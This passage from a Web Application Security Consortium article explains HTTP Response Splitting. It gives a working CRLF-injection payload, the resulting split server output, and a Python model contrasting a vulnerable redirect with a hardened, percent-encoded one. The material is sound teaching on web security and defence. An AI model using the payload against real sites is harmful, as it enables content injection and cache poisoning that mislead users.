As can be seen, the lang parameter is embedded verbatim in the Location
response header.
Now, we move on to mounting an HTTP Response Splitting attack.
Instead of sending the value English, we send a value that makes use
of URL-encoded CRLF sequences (%0d%0a) to terminate the current
response and shape an additional one. Here is how this is done:
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
This results in the following output stream, sent by the web server
over the TCP connection (each empty line is a CRLF CRLF sequence that
ends a header block):

HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Shazam</html>
Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003 271009 with
Content-Type: text/html
Set-Cookie: JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9UsS!-1251019693; path=/
[...]
Explanation: the target (a browser, or a caching proxy sitting in front
of it) will parse this TCP stream as follows:
A first HTTP response, which is a 302 (redirection) response. It runs
from the status line up to and including the empty line that follows
the injected Content-Length: 0 header; that zero length tells the parser
the response has no body and ends right there.
A second HTTP response, which is a 200 response, with a body
comprising the 19 bytes of HTML (<html>Shazam</html>) that follow its
own empty line. The server's remaining headers (Server, Content-Type,
Set-Cookie) arrive after that body and are treated as trailing junk.
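The following is an added example, not part of the WASC text, that models the exchange above end to end: a stand-in for the vulnerable redir_lang.jsp that copies the decoded lang parameter into Location, a simple HTTP/1.1 client-side parser that carves the resulting byte stream into responses, and a hardened variant of the redirect that percent-encodes the value before placing it in the header. The host 10.1.1.1, the 302 status line and the payload are taken from the page; the Date, Server and Set-Cookie values are constructed placeholders.

```python
"""HTTP Response Splitting walkthrough (added example, not WASC code).

Models the vulnerable redirect, shows how a client parses the split
stream into two responses, and contrasts a hardened redirect.
"""
from urllib.parse import quote, unquote

# The URL-encoded value sent for lang=..., as on the page.
PAYLOAD = (
    "foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2019%0d%0a%0d%0a<html>Shazam</html>"
)
# The servlet container decodes the query string before the JSP sees it,
# so the handler receives raw CR/LF characters.
MALICIOUS_LANG = unquote(PAYLOAD)

# Constructed placeholder header values (not from the page).
DATE = "Date: Wed, 24 Dec 2003 15:26:41 GMT"
SERVER = "Server: WebLogic (placeholder banner)"
COOKIE = "Set-Cookie: JSESSIONID=placeholder; path=/"


def vulnerable_redirect(lang: str) -> bytes:
    """Model of redir_lang.jsp: the parameter lands in Location untouched.

    Header order mirrors the page: the server's own headers follow Location,
    so after injection they trail the attacker's second response.
    """
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"{DATE}\r\n"
        f"Location: http://10.1.1.1/by_lang.jsp?lang={lang}\r\n"
        f"{SERVER}\r\n"
        "Content-Type: text/html\r\n"
        f"{COOKIE}\r\n"
        "\r\n"
    ).encode("latin-1")


def hardened_redirect(lang: str) -> bytes:
    """Same redirect, but the value is percent-encoded before it reaches the
    header, so CR and LF become the inert text %0D%0A."""
    safe_lang = quote(lang, safe="")
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"{DATE}\r\n"
        f"Location: http://10.1.1.1/by_lang.jsp?lang={safe_lang}\r\n"
        f"{SERVER}\r\n"
        "Content-Type: text/html\r\n"
        f"{COOKIE}\r\n"
        "\r\n"
    ).encode("latin-1")


def split_responses(stream: bytes):
    """Parse a TCP stream the way a plain HTTP/1.1 client does: status line,
    headers up to the empty line, then exactly Content-Length body bytes.

    Returns (responses, leftover). Parsing stops at the first block whose
    first line is not a status line; that tail is returned as leftover.
    """
    responses = []
    pos = 0
    while pos < len(stream):
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break
        lines = stream[pos:head_end].decode("latin-1").split("\r\n")
        if not lines[0].startswith("HTTP/"):
            break  # not a status line: a real client would discard this
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = head_end + 4
        responses.append({
            "status": lines[0],
            "headers": headers,
            "body": stream[body_start:body_start + length],
        })
        pos = body_start + length
    return responses, stream[pos:]


if __name__ == "__main__":
    parsed, junk = split_responses(vulnerable_redirect(MALICIOUS_LANG))
    for i, r in enumerate(parsed, 1):
        print(f"response {i}: {r['status']}  body={r['body']!r}")
    print(f"trailing junk: {junk[:40]!r}...")
    fixed, _ = split_responses(hardened_redirect(MALICIOUS_LANG))
    print(f"hardened: {len(fixed)} response(s), Location="
          f"{fixed[0]['headers']['location']}")
```

Running the script shows two responses carved from the vulnerable stream, the second carrying the attacker-controlled 19-byte body, while the hardened redirect yields a single 302 whose Location merely contains the literal text %0D%0A. The injected body is what a shared cache would store under the victim URL in a cache-poisoning follow-up.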
Copyright 2004, Web Application Security Consortium. All rights reserved.